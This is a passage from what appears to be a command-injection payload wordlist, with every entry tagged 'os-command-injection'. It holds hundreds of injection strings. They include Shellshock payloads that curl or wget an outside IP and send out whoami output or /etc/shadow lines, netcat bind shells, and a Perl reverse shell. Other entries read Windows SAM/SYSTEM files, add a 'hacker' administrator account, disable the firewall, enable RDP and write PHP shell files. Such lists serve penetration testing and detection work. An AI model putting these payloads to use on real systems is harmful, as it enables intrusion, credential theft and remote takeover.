XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')' +os-command-injection,'systeminfo' +os-command-injection,'| systeminfo' +os-command-injection,'; systeminfo' +os-command-injection,'& systeminfo' +os-command-injection,'&& systeminfo' +os-command-injection,'system('ls')' +os-command-injection,'system('pwd')' +os-command-injection,'system('pwd');' +os-command-injection,'|| system('sleep 5');' +os-command-injection,'| system('sleep 5');' +os-command-injection,'; system('sleep 5');' +os-command-injection,'& system('sleep 5');' +os-command-injection,'&& system('sleep 5');' +os-command-injection,'system('sleep 5')' +os-command-injection,'system('sleep 5');' +os-command-injection,'system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23')' +os-command-injection,'system('wget https://xerosecurity.com/.testing/rce_vuln.txt');' +os-command-injection,'system('whoami')' +os-command-injection,'system('whoami');' +os-command-injection,'test*; ls -lhtR /var/www/' +os-command-injection,'test* || perl -e 'print "X"x16096'' +os-command-injection,'test* | perl -e 'print "X"x16096'' +os-command-injection,'test* & perl -e 'print "X"x16096'' +os-command-injection,'test* && perl -e 'print "X"x16096'' +os-command-injection,'test*; perl -e 'print "X"x16096'' +os-command-injection,'$(`type C:\boot.ini`)' +os-command-injection,'&&type C:\\boot.ini' +os-command-injection,'| type C:\Windows\repair\SAM' +os-command-injection,'; type C:\Windows\repair\SAM' +os-command-injection,'& type C:\Windows\repair\SAM' +os-command-injection,'&& type C:\Windows\repair\SAM' +os-command-injection,'type C:\Windows\repair\SAM' +os-command-injection,'| type C:\Windows\repair\SYSTEM' +os-command-injection,'; type C:\Windows\repair\SYSTEM' +os-command-injection,'& type C:\Windows\repair\SYSTEM' +os-command-injection,'&& type C:\Windows\repair\SYSTEM' +os-command-injection,'type C:\Windows\repair\SYSTEM' +os-command-injection,'| type C:\WINNT\repair\SAM' +os-command-injection,'; type C:\WINNT\repair\SAM' +os-command-injection,'& type C:\WINNT\repair\SAM' +os-command-injection,'&& type C:\WINNT\repair\SAM' +os-command-injection,'type C:\WINNT\repair\SAM' +os-command-injection,'type C:\WINNT\repair\SYSTEM' +os-command-injection,'| type %SYSTEMROOT%\repair\SAM' +os-command-injection,'; type %SYSTEMROOT%\repair\SAM' +os-command-injection,'& type %SYSTEMROOT%\repair\SAM' +os-command-injection,'&& type %SYSTEMROOT%\repair\SAM' +os-command-injection,'type %SYSTEMROOT%\repair\SAM' +os-command-injection,'| type %SYSTEMROOT%\repair\SYSTEM' +os-command-injection,'; type %SYSTEMROOT%\repair\SYSTEM' +os-command-injection,'& type %SYSTEMROOT%\repair\SYSTEM' +os-command-injection,'&& type %SYSTEMROOT%\repair\SYSTEM' +os-command-injection,'type %SYSTEMROOT%\repair\SYSTEM' +os-command-injection,'uname' +os-command-injection,';uname;' +os-command-injection,'| uname -a' +os-command-injection,'; uname -a' +os-command-injection,'& uname -a' +os-command-injection,'&& uname -a' +os-command-injection,'uname -a' +os-command-injection,'|/usr/bin/id' +os-command-injection,';|/usr/bin/id|' +os-command-injection,';/usr/bin/id|' +os-command-injection,'$;/usr/bin/id' +os-command-injection,'() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\");'' +os-command-injection,'() { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11' +os-command-injection,'| wget http://crowdshield.com/.testing/rce.txt' +os-command-injection,'& wget http://crowdshield.com/.testing/rce.txt' +os-command-injection,'; wget https://crowdshield.com/.testing/rce_vuln.txt' +os-command-injection,'$(`wget https://crowdshield.com/.testing/rce_vuln.txt`)' +os-command-injection,'&& wget https://crowdshield.com/.testing/rce_vuln.txt' +os-command-injection,'wget https://crowdshield.com/.testing/rce_vuln.txt' +os-command-injection,'$(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)' +os-command-injection,'which curl' +os-command-injection,'which gcc' +os-command-injection,'which nc' +os-command-injection,'which netcat' +os-command-injection,'which perl' +os-command-injection,'which python' +os-command-injection,'which wget' +os-command-injection,'whoami' +os-command-injection,'| whoami' +os-command-injection,'; whoami' +os-command-injection,'' whoami' +os-command-injection,'' || whoami' +os-command-injection,'' & whoami' +os-command-injection,'' && whoami' +os-command-injection,''; whoami' +os-command-injection,'" whoami' +os-command-injection,'" || whoami' +os-command-injection,'" | whoami' +os-command-injection,'" & whoami' +os-command-injection,'" && whoami' +os-command-injection,'"; whoami' +os-command-injection,'$(`whoami`)' +os-command-injection,'& whoami' +os-command-injection,'&& whoami' +os-command-injection,'{{ get_user_file("C:\boot.ini") }}' +os-command-injection,'{{ get_user_file("/etc/hosts") }}' +os-command-injection,'{{ get_user_file("/etc/passwd") }}' +os-command-injection,'{{4+4}}' +os-command-injection,'{{4+8}}' +os-command-injection,'{{person.secret}}' +os-command-injection,'{{person.name}}' +os-command-injection,'{1} + {1}' +os-command-injection,'{% For c in [1,2,3]%} {{c, c, c}} {% endfor%}' +os-command-injection,'{{[] .__ Class __.__ base __.__ subclasses __ ()}}' +os-command-injection,'`' +os-command-injection,'||' +os-command-injection,'|' +os-command-injection,';' +os-command-injection,''' +os-command-injection,''"' +os-command-injection,'"' +os-command-injection,'"'' +os-command-injection,'&' +os-command-injection,'&&' +os-command-injection,'%0a' +os-command-injection,'%0a%0d' +os-command-injection,'%0Acat%20/etc/passwd' +os-command-injection,'%0Aid' +os-command-injection,'%0a id %0a' +os-command-injection,'%0Aid%0A' +os-command-injection,'%0a ping -i 30 127.0.0.1 %0a' +os-command-injection,'%0A/usr/bin/id' +os-command-injection,'%0A/usr/bin/id%0A' +os-command-injection,'%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1' +os-command-injection,'%20{${phpinfo()}}' +os-command-injection,'%20{${sleep(20)}}' +os-command-injection,'%20{${sleep(3)}}' +os-command-injection,'a|id|' +os-command-injection,'a;id|' +os-command-injection,'a;id;' +os-command-injection,'a;id\n' +os-command-injection,'() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`"' +os-command-injection,'() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`"' +os-command-injection,'() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`"' +os-command-injection,'() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`"' +os-command-injection,'() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`"' +os-command-injection,'() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`"' +os-command-injection,'() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5"' +os-command-injection,'() { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6"' +os-command-injection,'() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1"' +os-command-injection,'() { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7"' +os-command-injection,'() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3"' +os-command-injection,'() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8"' +os-command-injection,'() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9"' +os-command-injection,'() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"' +os-command-injection,'() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`"' +os-command-injection,'() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`"' +os-command-injection,'() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`"' +os-command-injection,'() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`"' +os-command-injection,'() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`"' +os-command-injection,'() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`"' +os-command-injection,'() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4"' +os-command-injection,'cat /etc/hosts' +os-command-injection,'$(`cat /etc/passwd`)' +os-command-injection,'cat /etc/passwd' +os-command-injection,'() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12' +os-command-injection,'| curl http://crowdshield.com/.testing/rce.txt' +os-command-injection,'& curl http://crowdshield.com/.testing/rce.txt' +os-command-injection,'; curl https://crowdshield.com/.testing/rce_vuln.txt' +os-command-injection,'&& curl https://crowdshield.com/.testing/rce_vuln.txt' +os-command-injection,'curl https://crowdshield.com/.testing/rce_vuln.txt' +os-command-injection,'curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt' +os-command-injection,'curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt' +os-command-injection,'$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)' +os-command-injection,'dir' +os-command-injection,'| dir' +os-command-injection,'; dir' +os-command-injection,'$(`dir`)' +os-command-injection,'& dir' +os-command-injection,'&&dir' +os-command-injection,'&& dir' +os-command-injection,'| dir C:\' +os-command-injection,'; dir C:\' +os-command-injection,'& dir C:\' +os-command-injection,'&& dir C:\' +os-command-injection,'dir C:\' +os-command-injection,'| dir C:\Documents and Settings\*' +os-command-injection,'; dir C:\Documents and Settings\*' +os-command-injection,'& dir C:\Documents and Settings\*' +os-command-injection,'&& dir C:\Documents and Settings\*' +os-command-injection,'dir C:\Documents and Settings\*' +os-command-injection,'| dir C:\Users' +os-command-injection,'; dir C:\Users' +os-command-injection,'& dir C:\Users' +os-command-injection,'&& dir C:\Users' +os-command-injection,'dir C:\Users' +os-command-injection,';echo%20''' +os-command-injection,'echo ''// XXXXXXXXXXX' +os-command-injection,'| echo "" > rfi.php' +os-command-injection,'; echo "" > rfi.php' +os-command-injection,'& echo "" > rfi.php' +os-command-injection,'&& echo "" > rfi.php' +os-command-injection,'echo "" > rfi.php' +os-command-injection,'| echo "" > dir.php' +os-command-injection,'; echo "" > dir.php' +os-command-injection,'& echo "" > dir.php' +os-command-injection,'&& echo "" > dir.php' +os-command-injection,'echo "" > dir.php' +os-command-injection,'| echo "" > cmd.php' +os-command-injection,'; echo "" > cmd.php' +os-command-injection,'& echo "" > cmd.php' +os-command-injection,'&& echo "" > cmd.php' +os-command-injection,'echo "" > cmd.php' +os-command-injection,';echo ''' +os-command-injection,'echo ''// XXXXXXXXXXX' +os-command-injection,'echo ''// XXXXXXXXXXX' +os-command-injection,'| echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl' +os-command-injection,'; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl' +os-command-injection,'& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl' +os-command-injection,'&& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl' +os-command-injection,'echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl' +os-command-injection,'() { :;}; echo vulnerable 10' +os-command-injection,'eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')' +os-command-injection,'eval('ls')' +os-command-injection,'eval('pwd')' +os-command-injection,'eval('pwd');' +os-command-injection,'eval('sleep 5')' +os-command-injection,'eval('sleep 5');' +os-command-injection,'eval('whoami')' +os-command-injection,'eval('whoami');' +os-command-injection,'exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')' +os-command-injection,'exec('ls')' +os-command-injection,'exec('pwd')' +os-command-injection,'exec('pwd');' +os-command-injection,'exec('sleep 5')' +os-command-injection,'exec('sleep 5');' +os-command-injection,'exec('whoami')' +os-command-injection,'exec('whoami');' +os-command-injection,';{$_GET["cmd"]}' +os-command-injection,'`id`' +os-command-injection,'|id' +os-command-injection,'| id' +os-command-injection,';id' +os-command-injection,';id|' +os-command-injection,';id;' +os-command-injection,'& id' +os-command-injection,'&&id' +os-command-injection,';id\n' +os-command-injection,'ifconfig' +os-command-injection,'| ifconfig' +os-command-injection,'; ifconfig' +os-command-injection,'& ifconfig' +os-command-injection,'&& ifconfig' +os-command-injection,'/index.html|id|' +os-command-injection,'ipconfig' +os-command-injection,'| ipconfig /all' +os-command-injection,'; ipconfig /all' +os-command-injection,'& ipconfig /all' +os-command-injection,'&& ipconfig /all' +os-command-injection,'ipconfig /all' +os-command-injection,'ls' +os-command-injection,'$(`ls`)' +os-command-injection,'| ls -l /' +os-command-injection,'; ls -l /' +os-command-injection,'& ls -l /' +os-command-injection,'&& ls -l /' +os-command-injection,'ls -l /' +os-command-injection,'| ls -laR /etc' +os-command-injection,'; ls -laR /etc' +os-command-injection,'& ls -laR /etc' +os-command-injection,'&& ls -laR /etc' +os-command-injection,'| ls -laR /var/www' +os-command-injection,'; ls -laR /var/www' +os-command-injection,'& ls -laR /var/www' +os-command-injection,'&& ls -laR /var/www' +os-command-injection,'| ls -l /etc/' +os-command-injection,'; ls -l /etc/' +os-command-injection,'& ls -l /etc/' +os-command-injection,'&& ls -l /etc/' +os-command-injection,'ls -l /etc/' +os-command-injection,'ls -lh /etc/' +os-command-injection,'| ls -l /home/*' +os-command-injection,'; ls -l /home/*' +os-command-injection,'& ls -l /home/*' +os-command-injection,'&& ls -l /home/*' +os-command-injection,'ls -l /home/*' +os-command-injection,'*; ls -lhtR /var/www/' +os-command-injection,'| ls -l /tmp' +os-command-injection,'; ls -l /tmp' +os-command-injection,'& ls -l /tmp' +os-command-injection,'&& ls -l /tmp' +os-command-injection,'ls -l /tmp' +os-command-injection,'| ls -l /var/www/*' +os-command-injection,'; ls -l /var/www/*' +os-command-injection,'& ls -l /var/www/*' +os-command-injection,'&& ls -l /var/www/*' +os-command-injection,'ls -l /var/www/*' +os-command-injection,'' +os-command-injection,'' +os-command-injection,'' +os-command-injection,'\n' +os-command-injection,'\n\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\`whoami\`' +os-command-injection,'\n\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\`whoami\`' +os-command-injection,'\n/bin/ls -al\n' +os-command-injection,'| nc -lvvp 4444 -e /bin/sh|' +os-command-injection,'; nc -lvvp 4444 -e /bin/sh;' +os-command-injection,'& nc -lvvp 4444 -e /bin/sh&' +os-command-injection,'&& nc -lvvp 4444 -e /bin/sh &' +os-command-injection,'nc -lvvp 4444 -e /bin/sh' +os-command-injection,'nc -lvvp 4445 -e /bin/sh &' +os-command-injection,'nc -lvvp 4446 -e /bin/sh|' +os-command-injection,'nc -lvvp 4447 -e /bin/sh;' +os-command-injection,'nc -lvvp 4448 -e /bin/sh&' +os-command-injection,'\necho INJECTX\nexit\n\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\n' +os-command-injection,'\necho INJECTX\nexit\n\033[2Asleep 5\n' +os-command-injection,'\necho INJECTX\nexit\n\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\n' +os-command-injection,'| net localgroup Administrators hacker /ADD' +os-command-injection,'; net localgroup Administrators hacker /ADD' +os-command-injection,'& net localgroup Administrators hacker /ADD' +os-command-injection,'&& net localgroup Administrators hacker /ADD' +os-command-injection,'net localgroup Administrators hacker /ADD' +os-command-injection,'| netsh firewall set opmode disable' +os-command-injection,'; netsh firewall set opmode disable' +os-command-injection,'& netsh firewall set opmode disable' +os-command-injection,'&& netsh firewall set opmode disable' +os-command-injection,'netsh firewall set opmode disable' +os-command-injection,'netstat' +os-command-injection,';netstat -a;' +os-command-injection,'| netstat -an' +os-command-injection,'; netstat -an' +os-command-injection,'& netstat -an' +os-command-injection,'&& netstat -an' +os-command-injection,'netstat -an' +os-command-injection,'| net user hacker Password1 /ADD' +os-command-injection,'; net user hacker Password1 /ADD' +os-command-injection,'& net user hacker Password1 /ADD' +os-command-injection,'&& net user hacker Password1 /ADD' +os-command-injection,'net user hacker Password1 /ADD' +os-command-injection,'| net view' +os-command-injection,'; net view' +os-command-injection,'& net view' +os-command-injection,'&& net view' +os-command-injection,'net view' +os-command-injection,'\nid|' +os-command-injection,'\nid;' +os-command-injection,'\nid\n' +os-command-injection,'\n/usr/bin/id\n' +os-command-injection,'perl -e 'print "X"x1024'' +os-command-injection,'|| perl -e 'print "X"x16096'' +os-command-injection,'| perl -e 'print "X"x16096'' +os-command-injection,'; perl -e 'print "X"x16096'' +os-command-injection,'& perl -e 'print "X"x16096'' +os-command-injection,'&& perl -e 'print "X"x16096'' +os-command-injection,'perl -e 'print "X"x16384'' +os-command-injection,'; perl -e 'print "X"x2048'' +os-command-injection,'& perl -e 'print "X"x2048'' +os-command-injection,'&& perl -e 'print "X"x2048'' +os-command-injection,'perl -e 'print "X"x2048'' +os-command-injection,'|| perl -e 'print "X"x4096'' +os-command-injection,'| perl -e 'print "X"x4096'' +os-command-injection,'; perl -e 'print "X"x4096'' +os-command-injection,'& perl -e 'print "X"x4096'' +os-command-injection,'&& perl -e 'print "X"x4096'' +os-command-injection,'perl -e 'print "X"x4096'' +os-command-injection,'|| perl -e 'print "X"x8096'' +os-command-injection,'| perl -e 'print "X"x8096'' +os-command-injection,'; perl -e 'print "X"x8096'' +os-command-injection,'&& perl -e 'print "X"x8096'' +os-command-injection,'perl -e 'print "X"x8192'' +os-command-injection,'perl -e 'print "X"x81920'' +os-command-injection,'|| phpinfo()' +os-command-injection,'| phpinfo()' +os-command-injection,'{${phpinfo()}}' +os-command-injection,';phpinfo()' +os-command-injection,';phpinfo();//' +os-command-injection,'';phpinfo();//' +os-command-injection,'{${phpinfo()}}' +os-command-injection,'& phpinfo()' +os-command-injection,'&& phpinfo()' +os-command-injection,'phpinfo()' +os-command-injection,'phpinfo();' +os-command-injection,'' +os-command-injection,'' +os-command-injection,'' +os-command-injection,'' +os-command-injection,'' +os-command-injection,'' +os-command-injection,'' +os-command-injection,'' +os-command-injection,':phpversion();' +os-command-injection,'`ping 127.0.0.1`' +os-command-injection,'& ping -i 30 127.0.0.1 &' +os-command-injection,'& ping -n 30 127.0.0.1 &' +os-command-injection,';${@print(md5(RCEVulnerable))};' +os-command-injection,'${@print("RCEVulnerable")}' +os-command-injection,'${@print(system($_SERVER['HTTP_USER_AGENT']))}' +os-command-injection,'pwd' +os-command-injection,'| pwd' +os-command-injection,'; pwd' +os-command-injection,'& pwd' +os-command-injection,'&& pwd' +os-command-injection,'\r' +os-command-injection,'| reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' +os-command-injection,'; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' +os-command-injection,'& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' +os-command-injection,'&& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' +os-command-injection,'reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' +os-command-injection,'\r\n' +os-command-injection,'route' +os-command-injection,'| sleep 1' +os-command-injection,'; sleep 1' +os-command-injection,'& sleep 1' +os-command-injection,'&& sleep 1' +os-command-injection,'sleep 1' +os-command-injection,'|| sleep 10' +os-command-injection,'| sleep 10' +os-command-injection,'; sleep 10' +os-command-injection,'{${sleep(10)}}' +os-command-injection,'& sleep 10' +os-command-injection,'&& sleep 10' +os-command-injection,'sleep 10' +os-command-injection,'|| sleep 15' +os-command-injection,'| sleep 15' +os-command-injection,'; sleep 15' +os-command-injection,'& sleep 15' +os-command-injection,'&& sleep 15' +os-command-injection,'{${sleep(20)}}' +os-command-injection,'{${sleep(20)}}' +os-command-injection,'{${sleep(3)}}' +os-command-injection,'{${sleep(3)}}' +os-command-injection,'| sleep 5' +os-command-injection,'; sleep 5' +os-command-injection,'& sleep 5' +os-command-injection,'&& sleep 5' +os-command-injection,'sleep 5' +os-command-injection,'{${sleep(hexdec(dechex(20)))}}' +os-command-injection,'{${sleep(hexdec(dechex(20)))}}' +os-command-injection,'sysinfo' +os-command-injection,'| sysinfo' +os-command-injection,'; sysinfo' +os-command-injection,'& sysinfo' +os-command-injection,'&& sysinfo' +os-command-injection,';system('cat%20/etc/passwd')' +os-command-injection,'system('cat C:\boot.ini');' +os-command-injection,'system('cat config.php');' +os-command-injection,'system('cat /etc/passwd');' +os-command-injection,'|| system('curl https://crowdshield.com/.testing/rce_vuln.txt');' +os-command-injection,'| system('curl https://crowdshield.com/.testing/rce_vuln.txt');' +os-command-injection,'; system('curl https://crowdshield.com/.testing/rce_vuln.txt');' +os-command-injection,'& system('curl https://crowdshield.com/.testing/rce_vuln.txt');' +os-command-injection,'&& system('curl https://crowdshield.com/.testing/rce_vuln.txt');' +os-command-injection,'system('curl https://crowdshield.com/.testing/rce_vuln.txt')' +os-command-injection,'system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf')' +os-command-injection,'system('curl https://xerosecurity.com/.testing/rce_vuln.txt');' +os-command-injection,'system('echo 